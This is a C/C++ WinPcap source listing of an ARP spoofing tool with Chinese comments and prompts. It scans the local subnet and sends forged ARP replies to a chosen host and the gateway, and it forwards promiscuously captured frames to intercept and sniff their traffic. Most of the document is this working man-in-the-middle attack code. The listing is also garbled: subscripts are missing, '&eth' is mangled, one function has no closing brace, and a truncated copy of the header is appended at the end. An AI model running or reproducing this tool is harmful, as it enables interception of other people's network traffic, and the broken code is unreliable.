ARP欺骗的源代码
#include?<stdlib.h>
#include?<stdio.h>
#include?<pcap.h>?//winpcap的頭文件
#include?<winsock2.h>
#include?<process.h>?//多線程編程的頭文件
#include?<windows.h>
#include?<Iphlpapi.h>?//提取網關用的頭文件
#pragma?comment(lib,"ws2_32")
#pragma?comment(lib,"pcap")
#pragma?comment(lib,"IPHlpApi")
#define?IPTOSBUFFERS?12?
#define?MOSTCHEATNUMBER?256?//最大的欺騙數目
#define?ETH_IP?0x0800?//定義各種標識的數值
#define?ETH_ARP?0x0806
#define?ARP_REPLY?0x0002
#define?ARP_REQUEST?0x0001
#define?ARP_HARDWARE?0x0001
/
typedef?struct?ethdr?// Ethernet II frame header exactly as it appears on the wire (6+6+2 = 14 bytes, no padding possible)
{
unsigned?char?eh_dst[6];    // destination MAC
unsigned?char?eh_src[6];    // source MAC
unsigned?short?eh_type;     // EtherType, network byte order (ETH_IP or ETH_ARP from the #defines above)
}ETHDR,*PETHDR;
// ARP body for Ethernet/IPv4 (RFC 826 field order).  Every sender in this
// file does memcpy(buf + sizeof(eth), &arp, sizeof(arp)) into a 42-byte
// frame buffer, which is only correct when sizeof(ARPHDR) == 28: the 4-byte
// arp_spa / arp_tpa fields follow 6-byte MAC arrays, so any alignment
// padding (or an 8-byte unsigned long) changes both the wire layout and the
// copy length.  No packing directive is visible in this listing — confirm
// sizeof(ARPHDR) == 28 on the target compiler before relying on sizeof().
typedef?struct?arphdr
{
unsigned?short?arp_hdr;     // hardware type (ARP_HARDWARE = Ethernet), network byte order
unsigned?short?arp_pro;     // protocol type (ETH_IP), network byte order
unsigned?char?arp_hln;      // hardware address length, always 6 here
unsigned?char?arp_pln;      // protocol address length, always 4 here
unsigned?short?arp_opt;     // opcode: ARP_REQUEST or ARP_REPLY, network byte order
unsigned?char?arp_sha[6];   // sender hardware (MAC) address
unsigned?long?arp_spa;      // sender protocol (IPv4) address, network byte order
unsigned?char?arp_tha[6];   // target hardware (MAC) address
unsigned?long?arp_tpa;      // target protocol (IPv4) address, network byte order
}ARPHDR,*PARPHDR;
// Singly linked list node pairing one IPv4 address with the MAC that
// answered for it during the ARP scan.  Records are allocated with `new`
// by the collector thread and freed with `delete` only when main() removes
// duplicates; the self-referential member without a `struct` keyword (and
// the use of new/delete) mean this file is compiled as C++.
typedef?struct?acttiveIpwithMac
{
acttiveIpwithMac*?next;     // next record, NULL at the tail
unsigned?long?ip;           // IPv4 address, network byte order
unsigned?char?mac[6];       // MAC observed in the ARP reply's sender field
}acttiveIpwithMac,*PacttiveIpwithMac;
char?*iptos(u_long?in);?// format a network-order IPv4 address as dotted-decimal text (static ring buffer, not thread-safe)
void?ifprint(pcap_if_t?*d);?// print the fields of one pcap_if entry
int?macequal(PacttiveIpwithMac?m,PacttiveIpwithMac?n);?// 1 when both records carry the same MAC
int?getmmac();?// learn this host's own MAC through pcap (GetAdaptersInfo would be the simpler source)
unsigned?int?_stdcall?sendpackettogetallacttiveIpwithMac(void?*x);?// scan thread: ARP-request every address of the local subnet
unsigned?int?_stdcall?recvpackettogetallacttiveIpwithMac(void?*x);?// collector thread: store ARP replies in the Pipmachead list
unsigned?int?_stdcall?sproof(void?*x);?// per-target poisoning thread; x points at the target's 1-based index from the scan listing
unsigned?int?_stdcall?transmitandsniffer(void?*x);?// forwarding thread for frames captured in promiscuous mode
int?Getgatewayip(ULONG?choosedip);?// look up the default gateway of the adapter that owns choosedip
//
// Globals shared across threads.  None of them is protected by a lock or
// declared atomic; the flags below are plain ints polled by worker threads.
PacttiveIpwithMac?myip,gateip,Pipmachead=NULL;?// this host, the gateway, and the head of the scanned-host list
ULONG?mynetmask;?// subnet mask of the selected adapter, network byte order
pcap_t?*slecadopt;?// pcap handle of the selected adapter; every thread sends and receives on it
int?Ssendover=0;?// set to 1 by main() to tell the collector thread to stop
int?cheat[MOSTCHEATNUMBER];?// per-target on/off flags read by sproof threads, written by main()
///
/*
 * Program entry point.  Lists pcap adapters, opens the one chosen on stdin
 * in promiscuous mode, learns own IP/netmask/MAC and the default gateway,
 * ARP-scans the subnet into Pipmachead, starts the forwarding thread, then
 * loops forever on stdin: a positive index starts a sproof thread for that
 * scanned host, a negative index clears its cheat flag.  Returns -1 on
 * adapter setup failures; the interactive loop has no exit, so the final
 * return 1 is unreachable.
 */
int?main()?
{
???myip=new?acttiveIpwithMac;?// record for this host (fields left uninitialised by new)
gateip=new?acttiveIpwithMac;?// record for the gateway (mac stays uninitialised unless replaced below)
u_long?sendarphd,recvarphd,transhd,sproofhd[MOSTCHEATNUMBER];?// thread handles (_beginthreadex returns uintptr_t, which is wider than u_long on 64-bit Windows)
???PacttiveIpwithMac?z,k,j;
???unsigned?sendarpid,recvarpid,transid,sproofid[MOSTCHEATNUMBER];?// thread ids filled in by _beginthreadex
???pcap_if_t?*alldevs,*d;?// pcap adapter list and the selected entry
int?i=0,m,maxactive,inum;
char?error[PCAP_ERRBUF_SIZE];?
???
/* enumerate adapters */
if?(pcap_findalldevs(&alldevs,?error)?==?-1)
{
fprintf(stderr,"Error?in?pcap_findalldevs:?%s\n",?error);
return?-1;
}
/* print every adapter, numbering from 1 */
for(d=alldevs;?d;?d=d->next)
{
printf("%d.?",?++i);
???ifprint(d);?/* ifprint() prints the pcap_if fields */
if?(d->description)
printf("?(%s)\n",?d->description);
else
printf("?(No?description?available)\n");
}
???
if(i==0)
{
printf("\nNo?interfaces?found!?Make?sure?WinPcap?is?installed.\n");
return?-1;
}
printf("Enter?the?interface?number?(1-%d):",i);
scanf("%d",?&inum);?// return value unchecked: on non-numeric input inum (never initialised) is read below
if(inum?<?1?||?inum?>?i)?// range check on the adapter number
{
printf("\nInterface?number?out?of?range.\n");
/*?Free?the?device?list?*/
pcap_freealldevs(alldevs);
return?-1;
}
/* advance d to the inum-th adapter (empty loop body is intentional) */
for(d=alldevs,?i=0;?i<?inum-1?;d=d->next,?i++);
???/* own IPv4 address: assumes the first address entry exists and is AF_INET — TODO confirm, pcap can list adapters with no addresses */
???myip->ip=((struct?sockaddr_in?*)d->addresses->addr)->sin_addr.s_addr;
???/* netmask of the same entry (netmask may be NULL for some adapters) */
???mynetmask=((struct?sockaddr_in?*)d->addresses->netmask)->sin_addr.s_addr;
/* open the adapter: snaplen 1000, promiscuous mode on, 1 ms read timeout.
 * Promiscuous mode on a host NIC is itself a condition endpoint monitoring can report. */
if((slecadopt?=?pcap_open_live(d->name,?1000,?1,?1,?error)?)?==?NULL)
{
fprintf(stderr,"\nError?opening?adapter:?%s\n",?error);
???pcap_freealldevs(alldevs);
return?-1;
}
/* default gateway of this adapter; on failure gateip->ip stays uninitialised */
if(Getgatewayip(myip->ip))
???printf("\tGateway:?%s\n",iptos(gateip->ip));
/* own MAC; retries until a reply arrives, so this spins forever if none ever does */
???while(getmmac()==0);
???printf("my?mac:?%02x:%02x:%02x:%02x:%02x:%02x\n\n",myip->mac[0],myip->mac[1],myip->mac[2],myip->mac[3],myip->mac[4],myip->mac[5]);
/* scan the subnet: one thread sends ARP requests, one collects the replies */
sendarphd=_beginthreadex(NULL,0,sendpackettogetallacttiveIpwithMac,0,0,&sendarpid);// start the scan (sender) thread
???recvarphd=_beginthreadex(NULL,0,recvpackettogetallacttiveIpwithMac,0,0,&recvarpid);// start the collector thread
WaitForSingleObject((HANDLE)sendarphd,INFINITE);?// wait for the sender to finish
???for(m=5;m>0;m--)
???{
???printf("scanning\n");
Sleep(500);?// 5 x 500 ms grace period for late replies
???}
???Ssendover=1;// ask the collector to stop (plain int, no synchronisation)
???WaitForSingleObject((HANDLE)recvarphd,INFINITE);?// wait for the collector to finish
???if(Pipmachead!=NULL)
???{
???/* remove duplicate (ip, mac) records: for each k, unlink every later node equal to it */
???for(k=Pipmachead;k->next!=NULL;k=k->next)
???for(z=k;z->next!=NULL;)
???{
???if((k->ip==z->next->ip)&&(macequal(k,z->next)))
???{
j=z->next;
???z->next=j->next;
???delete?j;
???}
???else
z=z->next;
???}
???/* print the numbered host list; i ends as count+1 */
???for(z=Pipmachead,i=1;z!=NULL;z=z->next,i++)
printf("%-3d?ip=%-20s?mac=%02x:%02x:%02x:%02x:%02x:%02x\n",i,iptos(z->ip),z->mac[0],z->mac[1],z->mac[2],z->mac[3],z->mac[4],z->mac[5]);
???}
???/* point gateip at the scan record of the gateway so gateip->mac is valid.
 * Not guarded by the NULL check above (Pipmachead->next is dereferenced when no host answered),
 * and the loop condition never examines the last node; if no match is made gateip->mac stays uninitialised. */
???for(k=Pipmachead;k->next!=NULL;k=k->next)
if(k->ip==gateip->ip)
gateip=k;
???maxactive=i-1;
???CloseHandle((HANDLE)sendarphd);
???CloseHandle((HANDLE)recvarphd);
???transhd=_beginthreadex(NULL,0,transmitandsniffer,0,0,&transid);?// start the forwarding thread
printf("transmitandsniffer已經開始了!!\n");
???for(i=0;i<256;i++)
cheat=0;	// listing shows "cheat=0": assigning to an array is invalid, the subscript [i] was presumably lost in extraction (same on the two loops below)
???printf("已經得到了本局域網的活動主機!!!\n選擇你想欺騙的機器序號一次一臺:");
printf("選擇你想欺騙的機器序號:\n");
???for(;;)	// command loop; no break or return inside, so it never ends
???{
???scanf("%d",&i);	// unchecked; on failure i keeps its previous value
???if(i>0&&i<=maxactive)
???{
???if(cheat[i-1]==0)
???{
???cheat[i-1]=1;
???sproofhd[i-1]=_beginthreadex(NULL,0,sproof,&i,0,&sproofid[i-1]);	// passes the address of the loop variable, which this loop keeps overwriting below — the thread may read a different index (race)
???}
???else
???printf("\n%d號機已經欺騙了!!大佬!!\n",i);
???}
???else?if(i<0&&i>=-maxactive)
???{
???if(cheat[-i-1]==1)
???{
cheat[-i-1]=0;	// the sproof thread polls this flag and exits on its own
CloseHandle((HANDLE)sproofhd[i-1]);	// i is negative in this branch, so sproofhd[i-1] indexes before the array (out-of-bounds read)
???}
???else
???printf("\n%d號機沒欺騙怎么結束啊!!大佬!!\n",-i);
???}
???else?if(i>maxactive||-i>maxactive)
???{
???printf("\n沒有這么多機器,大哥,只有%d臺!!\n",maxactive);
???}
???else
???{
for(i=0;i<256;i++)	// i == 0: clear every flag, stopping all sproof threads
???cheat=0;
???}
???Sleep(100);
Sleep(100);
???Sleep(100);
???Sleep(100);
for(i=0;i<256;i++)	// status line for every active target
if(cheat==1)
???printf("\n%d號機正在被欺騙和嗅探選擇,想退出對此機的嗅探輸入-%d",i+1,i+1);
Sleep(100);
???Sleep(100);
???printf("\n選擇你想嗅探的機器序號:");
???
???}
???return?1;	// unreachable
}
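#ifndef IPTOSBUFFERS
#define IPTOSBUFFERS 12 /* fallback so this block builds standalone; the file defines it above */
#endif

/*
 * iptos - format an IPv4 address (network byte order, as stored in
 * sockaddr_in.sin_addr) as dotted-decimal text.
 *
 * Returns a pointer into a ring of IPTOSBUFFERS static buffers, so up to
 * IPTOSBUFFERS results may be alive at once (several calls inside a single
 * printf() are fine).  The ring is NOT thread-safe: this file calls iptos()
 * from main() and from worker threads, and concurrent calls can race on
 * `which` and overwrite each other's output.
 */
char *iptos(u_long in)
{
    enum { IPTOS_LEN = 3 * 4 + 3 + 1 };        /* "255.255.255.255" + NUL */
    static char output[IPTOSBUFFERS][IPTOS_LEN];
    static short which;
    unsigned char p[4];

    /* Copy the first four bytes in memory, exactly what the original
     * (u_char *)&in cast read; avoids the aliasing cast. */
    memcpy(p, &in, sizeof p);
    which = (which + 1 == IPTOSBUFFERS) ? 0 : which + 1;
    /* snprintf bounds the write even though the widest output fits. */
    snprintf(output[which], sizeof output[which], "%u.%u.%u.%u", p[0], p[1], p[2], p[3]);
    return output[which];
}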
/*
 * macequal - compare the MAC addresses of two host records.
 * Returns 1 when all six bytes are identical, 0 otherwise.
 * Neither argument may be NULL.
 */
int macequal(PacttiveIpwithMac m, PacttiveIpwithMac n)
{
    return (memcmp(m->mac, n->mac, sizeof m->mac) == 0) ? 1 : 0;
}
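/*
 * ifprint - print one pcap interface: name, description, loopback flag and,
 * for every AF_INET address attached to it, the address plus whichever of
 * netmask / broadcast / destination pointers are present.
 *
 * Address entries whose `addr` pointer is NULL are skipped instead of being
 * dereferenced (the original read sa_family before checking the pointer);
 * the optional netmask/broadaddr/dstaddr pointers are checked one by one, as
 * libpcap does not guarantee them.  Other address families are reported as
 * "Unknown".  Output goes to stdout via iptos().
 */
void ifprint(pcap_if_t *d)
{
    pcap_addr_t *a;

    printf("%s\n", d->name);
    if (d->description)
        printf("\tDescription: %s\n", d->description);
    printf("\tLoopback: %s\n", (d->flags & PCAP_IF_LOOPBACK) ? "yes" : "no");

    for (a = d->addresses; a; a = a->next)
    {
        /* Guard before the first dereference of a->addr. */
        if (a->addr == NULL)
            continue;
        printf("\tAddress Family: #%d\n", a->addr->sa_family);
        switch (a->addr->sa_family)
        {
        case AF_INET:
            printf("\tAddress Family Name: AF_INET\n");
            printf("\tAddress: %s\n", iptos(((struct sockaddr_in *)a->addr)->sin_addr.s_addr));
            if (a->netmask)
                printf("\tNetmask: %s\n", iptos(((struct sockaddr_in *)a->netmask)->sin_addr.s_addr));
            if (a->broadaddr)
                printf("\tBroadcast Address: %s\n", iptos(((struct sockaddr_in *)a->broadaddr)->sin_addr.s_addr));
            if (a->dstaddr)
                printf("\tDestination Address: %s\n", iptos(((struct sockaddr_in *)a->dstaddr)->sin_addr.s_addr));
            break;
        default:
            printf("\tAddress Family Name: Unknown\n");
            break;
        }
    }
}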
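/*
 * Getgatewayip - find the default gateway of the adapter whose IPv4 address
 * is `choosedip` (network byte order) using GetAdaptersInfo().
 *
 * On success the gateway address is stored into the global gateip->ip and
 * 1 is returned.  Returns 0 when no adapter carries choosedip, when the
 * matching adapter has no gateway entry, or when allocation / the IP Helper
 * call fails.  The adapter buffer is released on every return path (the
 * original leaked it), and the caller-supplied address is used instead of
 * the global myip->ip (main() passes myip->ip, so behaviour is unchanged).
 */
int Getgatewayip(ULONG choosedip)
{
    int found = 0;
    ULONG ulOutBufLen = sizeof(IP_ADAPTER_INFO);
    PIP_ADAPTER_INFO pAdapterInfo = (IP_ADAPTER_INFO *) malloc(ulOutBufLen);
    if (pAdapterInfo == NULL)
        return 0;

    /* First call only sizes the buffer; the list is usually longer than one entry. */
    if (GetAdaptersInfo(pAdapterInfo, &ulOutBufLen) == ERROR_BUFFER_OVERFLOW)
    {
        free(pAdapterInfo);
        pAdapterInfo = (IP_ADAPTER_INFO *) malloc(ulOutBufLen);
        if (pAdapterInfo == NULL)
            return 0;
    }

    if (GetAdaptersInfo(pAdapterInfo, &ulOutBufLen) == NO_ERROR)
    {
        PIP_ADAPTER_INFO pAdapter;
        for (pAdapter = pAdapterInfo; pAdapter != NULL; pAdapter = pAdapter->Next)
        {
            if (choosedip != inet_addr(pAdapter->IpAddressList.IpAddress.String))
            {
                printf("\t***\n");   /* progress marker kept from the original */
                continue;
            }
            /* An adapter with no configured gateway typically carries an empty
             * string here, which inet_addr() maps to INADDR_NONE; report that
             * as "not found" rather than handing 255.255.255.255 to the caller. */
            ULONG gw = inet_addr(pAdapter->GatewayList.IpAddress.String);
            if (gw != INADDR_NONE)
            {
                gateip->ip = gw;
                found = 1;
            }
            break;
        }
    }

    free(pAdapterInfo);
    return found;
}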
/*
 * Learn this host's own MAC address: broadcast an ARP request for myip->ip
 * from a dummy sender (MAC 0f:..:0f, IP 127.0.0.2), then read frames until
 * an ARP reply whose target IP is 127.0.0.2 arrives and copy its sender
 * MAC into myip->mac.
 *
 * Returns 1 when six bytes were copied, 0 when the send failed or
 * pcap_next_ex() reported an error before a matching reply.
 *
 * Notes for a reader:
 *  - pcap_next_ex() returns 0 on a read timeout without a valid pkt_data;
 *    unlike transmitandsniffer(), this loop does not skip that case and
 *    dereferences pkt_data anyway.
 *  - the header fields are read through raw offsets (12, 20, 22, 38) with
 *    no check of pkt_header->caplen, so a short frame is read past its end.
 *  - `e` in the memcpy below is presumably an extraction artefact of `&eth`
 *    (the neighbouring copy uses `&arp`).
 */
int?getmmac()
{?
unsigned?char?sendbuf[42];	// 14-byte Ethernet header + 28-byte ARP body
int?i=7,k;	// i != 6 until a reply has been parsed; k reused as the pcap_next_ex() result
ETHDR?eth;
ARPHDR?arp;
struct?pcap_pkthdr?*?pkt_header;
u_char?*?pkt_data;?
for(k=0;k<6;k++)
{
eth.eh_dst[k]=0xff;	// broadcast destination
eth.eh_src[k]=0x0f;	// dummy source MAC
arp.arp_sha[k]=0x0f;
arp.arp_tha[k]=0x00;
}
eth.eh_type=htons(ETH_ARP);
arp.arp_hdr=htons(ARP_HARDWARE);
arp.arp_pro=htons(ETH_IP);
arp.arp_hln=6;
arp.arp_pln=4;
arp.arp_opt=htons(ARP_REQUEST);
arp.arp_tpa=myip->ip;	// ask for our own address
arp.arp_spa=inet_addr("127.0.0.2");?// arbitrary sender address, used below to recognise the reply
memset(sendbuf,0,sizeof(sendbuf));
memcpy(sendbuf,e,sizeof(eth));
memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));	// overruns sendbuf if sizeof(arp) > 28 (see ARPHDR)
if(pcap_sendpacket(slecadopt,sendbuf,42)==0)
{
printf("PacketSend?succeed\n\n");
}
else
{
printf("PacketSendPacket?in?getmine?Error:?%d\n",GetLastError());
return?0;
}
// >= 0 keeps looping on timeouts (0) as well as packets (1); only an error (<0) ends it
while((k=pcap_next_ex(slecadopt,&pkt_header,(const?u_char**)&pkt_data))>=0)
{?
// EtherType == ARP, opcode == reply, target IP == our dummy 127.0.0.2
if(*(unsigned?short?*)(pkt_data+12)==htons(ETH_ARP)&&*(unsigned?short*)(pkt_data+20)==htons(ARP_REPLY)&&*(unsigned?long*)(pkt_data+38)==inet_addr("127.0.0.2"))
{
for(i=0;i<6;i++)
{
myip->mac=*(unsigned?char*)(pkt_data+22+i);	// listing shows "myip->mac=": the subscript [i] was presumably lost in extraction
}
break;
}
}
if(i==6)	// only true when the copy loop above ran to completion
{
return?1;
}
else
{
return?0;
}
}
/*
 * Scan thread: broadcast one ARP request per address from the network
 * address to the broadcast address of the local subnet (derived from
 * myip->ip and mynetmask), using our real MAC/IP as sender.
 *
 * The thread parameter x is unused.  Returns 0 on the first send error,
 * 1 after the whole range has been sent.
 *
 * A burst of ARP requests covering an entire subnet from a single MAC in a
 * few seconds is a classic scan signature; arpwatch-style monitors and IDS
 * ARP-rate rules alert on exactly this traffic.
 */
unsigned?int?_stdcall?sendpackettogetallacttiveIpwithMac(void?*x)
{?
ULONG?tip,subnetsta,subnetend;
unsigned?char?sendbuf[42];
int?k;
ETHDR?eth;
ARPHDR?arp;
subnetsta=htonl(myip->ip&mynetmask);?// network address, converted to host order so it can be incremented
subnetend=htonl(htonl(subnetsta)|(~mynetmask));?// back to network order, OR in the inverted mask, back to host order: the broadcast address
for(k=0;k<6;k++)
{
eth.eh_dst[k]=0xff;	// broadcast
eth.eh_src[k]=myip->mac[k];
arp.arp_sha[k]=myip->mac[k];
arp.arp_tha[k]=0x00;
}
eth.eh_type=htons(ETH_ARP);
arp.arp_hdr=htons(ARP_HARDWARE);
arp.arp_pro=htons(ETH_IP);
arp.arp_hln=6;
arp.arp_pln=4;
arp.arp_opt=htons(ARP_REQUEST);
arp.arp_spa=myip->ip;
memset(sendbuf,0,sizeof(sendbuf));
memcpy(sendbuf,e,sizeof(eth));	// `e` is presumably an extraction artefact of `&eth`
for(tip=subnetsta;tip<=subnetend;tip++)	// inclusive of both ends; loops forever if subnetend == ULONG_MAX
{
arp.arp_tpa=htonl(tip);	// only the target IP changes per frame
memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));	// overruns sendbuf if sizeof(arp) > 28 (see ARPHDR)
???if(pcap_sendpacket(slecadopt,sendbuf,42)!=0)
{
printf("Getallactive?ip?PacketSendPacket?in?getmine?Error:?%d\n",GetLastError());
return?0;
}
}
return?1;
}
/*
 * Collector thread: for every ARP reply addressed to myip->ip, append a new
 * acttiveIpwithMac record (sender IP + sender MAC) to the Pipmachead list.
 *
 * The loop ends when main() sets Ssendover (checked only after a packet
 * has been received), or when pcap_next_ex() returns 0 (read timeout) or
 * an error — the condition is > 0, so a quiet adapter also terminates the
 * thread.  x is unused; always returns 1.
 *
 * Duplicate replies produce duplicate records; main() removes them after
 * the thread has finished.  Fields are read at raw offsets with no caplen
 * check.
 */
unsigned?int?_stdcall?recvpackettogetallacttiveIpwithMac(void?*x)
{?
struct?pcap_pkthdr?*?pkt_header;
u_char?*?pkt_data;?
PacttiveIpwithMac?p,q;	// p: new record; q: current tail of the list
int?i;
while((pcap_next_ex(slecadopt,&pkt_header,(const?u_char**)&pkt_data))>0)
{?
// EtherType == ARP, opcode == reply, target IP == ours
if(*(unsigned?short?*)(pkt_data+12)==htons(ETH_ARP)&&*(unsigned?short*)(pkt_data+20)==htons(ARP_REPLY)&&*(unsigned?long*)(pkt_data+38)==myip->ip)
{
p=new?acttiveIpwithMac;
p->next=NULL;
p->ip=*(unsigned?long*)(pkt_data+28);	// sender protocol address
for(i=0;i<6;i++)
{
???p->mac=*(unsigned?char*)(pkt_data+22+i);	// sender hardware address; the subscript [i] was presumably lost in extraction
}
if(Pipmachead==NULL)
{?
???Pipmachead=p;	// first record becomes the head
q=p;
}
else
{
q->next=p;	// append at the tail
q=p;
}?
}
if(Ssendover==1)	// stop request from main(); plain int, no synchronisation
{
???return?1;
}
}
return?1;
}
/*
 * Forwarding thread.  Reads every frame the adapter captures (it was opened
 * in promiscuous mode by main()); for IPv4 frames that were not sent by
 * us, are not addressed to our IP and are not Ethernet broadcast, it copies
 * the frame, rewrites the 12-byte destination/source MAC pair (destination
 * = gateway MAC, or the scanned host's MAC when the IP destination is in
 * the Pipmachead list; source = our MAC) and re-sends it on the same
 * adapter.  x is unused; returns 1 only after pcap_next_ex() reports an
 * error.
 *
 * Safety notes: the frame is copied into a 1600-byte stack buffer with no
 * check of pkt_header->caplen — currently bounded only by the snaplen of
 * 1000 that main() passes to pcap_open_live(); the two changemac objects
 * are never deleted; the pcap_sendpacket() result is ignored.  Re-emitted
 * copies of every frame with our MAC as source are the traffic pattern
 * that switch port-security and duplicate-frame monitoring pick up.
 */
unsigned?int?_stdcall?transmitandsniffer(void?*x)
{
struct?changemac	// a 12-byte destination+source MAC pair, the leading part of an Ethernet header
{
unsigned?char?mac[12];
};
unsigned?char?bcast[6];
memset(bcast,0xff,sizeof(bcast));	// Ethernet broadcast address, used to skip broadcast frames
unsigned?char?sendbuf[1600];	// copy of the frame being rewritten; no caplen check before the memcpy below
struct?pcap_pkthdr?*?pkt_header;
u_char?*?pkt_data;
changemac?*cmac,*togatewaymac;
PacttiveIpwithMac?z;
int?i,j;
cmac=new?changemac;	// never deleted
togatewaymac=new?changemac;	// never deleted
memcpy(togatewaymac->mac,gateip->mac,6);	// default rewrite: to the gateway ...
memcpy(togatewaymac->mac+6,myip->mac,6);	// ... from us
while((j=pcap_next_ex(slecadopt,&pkt_header,(const?u_char**)&pkt_data))>=0)
{?
???if(j==0)	// read timeout: pkt_data is not valid, skip
{
continue;
}
// IPv4, not from our MAC, IP destination is not ours, not Ethernet broadcast
if(*(unsigned?short?*)(pkt_data+12)==htons(ETH_IP)&&(!(memcmp(pkt_data+6,myip->mac,6)==0))&&*(unsigned?long?*)(pkt_data+30)!=myip->ip&&(!(memcmp(pkt_data,bcast,6)==0)))
{
memcpy(sendbuf,pkt_data,pkt_header->caplen);	// whole captured frame
???memcpy(sendbuf,togatewaymac,12);	// assume it should go to the gateway
for(z=Pipmachead;z!=NULL;z=z->next)
{
???if(*(unsigned?long?*)(pkt_data+30)==z->ip)	// IP destination is a scanned host: deliver to that host instead
{
???i=0;
memcpy(cmac->mac,z->mac,6);
memcpy(cmac->mac+6,myip->mac,6);
???memcpy(sendbuf,cmac,12);
break;
}?
}
pcap_sendpacket(slecadopt,sendbuf,pkt_header->caplen);	// return value ignored
???
}
}
return?1;
}
/*
 * Poisoning thread for one scanned host.  x points at the host's 1-based
 * index into the Pipmachead list (main() passes the address of its own
 * loop variable, which it keeps modifying, so the index read here may
 * already differ).  Four 42-byte ARP replies are built up front: two
 * forged ones that pair the gateway's IP with our MAC (sent to the host)
 * and the host's IP with our MAC (sent to the gateway), and two restoring
 * ones carrying the genuine MACs.  The forged pair is re-sent every 980 ms
 * until main() clears cheat[i-1]; then the restoring pair is sent ten
 * times and the thread returns 1.  Returns 0 on any send error.
 *
 * Unsolicited ARP replies at a fixed ~1 s cadence whose sender MAC differs
 * from the MAC previously seen for that IP are exactly what arpwatch,
 * Dynamic ARP Inspection and host ARP-cache monitors alert on; static ARP
 * entries for the gateway defeat the host-side poisoning.
 *
 * The list walk below does not check for NULL (main() bounds-checks the
 * index against maxactive before starting the thread).  In this listing
 * the function's closing brace is missing; the duplicate copy of the file
 * further down ends it with "}".
 */
unsigned?int?_stdcall?sproof(void?*x)
{
int?j,i=*(int*)x;	// i: 1-based index of the target host
unsigned?char?sendbuftogate[42],sendbuftosp[42],rsendbuftogate[42],rsendbuftosp[42];	// forged-to-gateway, forged-to-host, restore-to-gateway, restore-to-host
PacttiveIpwithMac?spip;	// the target's scan record
ETHDR?eth;
ARPHDR?arp;
int?k;
for(spip=Pipmachead,j=0;j<i-1;spip=spip->next,j++);	// walk to the i-th record (empty loop body intentional)
printf("%-3d?ip=%-20s?mac=%02x:%02x:%02x:%02x:%02x:%02x\n",i,iptos(spip->ip),spip->mac[0],spip->mac[1],spip->mac[2],spip->mac[3],spip->mac[4],spip->mac[5]);
/* forged reply to the gateway: host's IP, our MAC */
for(k=0;k<6;k++)
{
eth.eh_dst[k]=gateip->mac[k];
eth.eh_src[k]=myip->mac[k];
arp.arp_sha[k]=myip->mac[k];
arp.arp_tha[k]=gateip->mac[k];
}
eth.eh_type=htons(ETH_ARP);
arp.arp_hdr=htons(ARP_HARDWARE);
arp.arp_pro=htons(ETH_IP);
arp.arp_hln=6;
arp.arp_pln=4;
arp.arp_opt=htons(ARP_REPLY);	// unsolicited reply; the same opcode is reused for all four frames
arp.arp_spa=spip->ip;
arp.arp_tpa=gateip->ip;
memset(sendbuftogate,0,sizeof(sendbuftogate));
memcpy(sendbuftogate,e,sizeof(eth));	// `e` is presumably an extraction artefact of `&eth` (same on the three copies below)
memcpy(sendbuftogate+sizeof(eth),&arp,sizeof(arp));	// overruns the 42-byte buffer if sizeof(arp) > 28 (see ARPHDR)
/* forged reply to the host: gateway's IP, our MAC */
for(k=0;k<6;k++)
{
eth.eh_dst[k]=spip->mac[k];
eth.eh_src[k]=myip->mac[k];
arp.arp_sha[k]=myip->mac[k];
arp.arp_tha[k]=spip->mac[k];
}
arp.arp_spa=gateip->ip;
arp.arp_tpa=spip->ip;
memset(sendbuftosp,0,sizeof(sendbuftosp));
memcpy(sendbuftosp,e,sizeof(eth));
memcpy(sendbuftosp+sizeof(eth),&arp,sizeof(arp));
/* restoring reply to the host: gateway's IP with the gateway's genuine MAC */
for(k=0;k<6;k++)
{
eth.eh_dst[k]=spip->mac[k];
eth.eh_src[k]=gateip->mac[k];
arp.arp_sha[k]=gateip->mac[k];
arp.arp_tha[k]=spip->mac[k];
}
arp.arp_spa=gateip->ip;
arp.arp_tpa=spip->ip;
memset(rsendbuftosp,0,sizeof(rsendbuftosp));
memcpy(rsendbuftosp,e,sizeof(eth));
memcpy(rsendbuftosp+sizeof(eth),&arp,sizeof(arp));
/* restoring reply to the gateway: host's IP with the host's genuine MAC */
for(k=0;k<6;k++)
{
eth.eh_dst[k]=gateip->mac[k];
eth.eh_src[k]=spip->mac[k];
arp.arp_sha[k]=spip->mac[k];
arp.arp_tha[k]=gateip->mac[k];
}
arp.arp_spa=spip->ip;
arp.arp_tpa=gateip->ip;
memset(rsendbuftogate,0,sizeof(rsendbuftogate));
memcpy(rsendbuftogate,e,sizeof(eth));
memcpy(rsendbuftogate+sizeof(eth),&arp,sizeof(arp));
printf("已經進入%d號機的欺騙!!!\n",i);
while(TRUE)	// runs until cheat[i-1] is cleared or a send fails
{?
if(pcap_sendpacket(slecadopt,sendbuftogate,42)!=0)
{
???printf("sendbuftogate?Error:?%d\n",GetLastError());
???return?0;
}
???if(pcap_sendpacket(slecadopt,sendbuftosp,42)!=0)
{
???printf("sendbuftosp?Error:?%d\n",GetLastError());
???return?0;
}
Sleep(980);	// fixed ~1 s re-send cadence
if(cheat[i-1]==0)?// flag cleared by main(): send the restoring pair and leave
{
for(j=10;j>0;j--)	// repeated ten times so the caches are overwritten even if some frames are lost
{
if(pcap_sendpacket(slecadopt,rsendbuftogate,42)!=0)
{
???printf("sendbuftogate?Error:?%d\n",GetLastError());
???return?0;
}
???if(pcap_sendpacket(slecadopt,rsendbuftosp,42)!=0)
{
???printf("sendbuftosp?Error:?%d\n",GetLastError());
???return?0;
}
}
printf("已經退出對%d號機的欺騙!!!\n",i);
return?1;
}
}
// NOTE(review): the closing brace of sproof() is missing here in the listing.
#include?<stdio.h>
#include?<pcap.h>?//winpcap的頭文件
#include?<winsock2.h>
#include?<process.h>?//多線程編程的頭文件
#include?<windows.h>
#include?<Iphlpapi.h>?//提取網關用的頭文件
#pragma?comment(lib,"ws2_32")
#pragma?comment(lib,"pcap")
#pragma?comment(lib,"IPHlpApi")
#define?IPTOSBUFFERS?12?
#define?MOSTCHEATNUMBER?256?//最大的欺騙數目
#define?ETH_IP?0x0800?//定義各種標識的數值
#define?ETH_ARP?0x0806
#define?ARP_REPLY?0x0002
#define?ARP_REQUEST?0x0001
#define?ARP_HARDWARE?0x0001
/
typedef?struct?ethdr?//以太頭結構
{
unsigned?char?eh_dst[6];
unsigned?char?eh_src[6];
unsigned?short?eh_type;
}ETHDR,*PETHDR;
typedef?struct?arphdr?//arp頭結構
{
unsigned?short?arp_hdr;
unsigned?short?arp_pro;
unsigned?char?arp_hln;
unsigned?char?arp_pln;
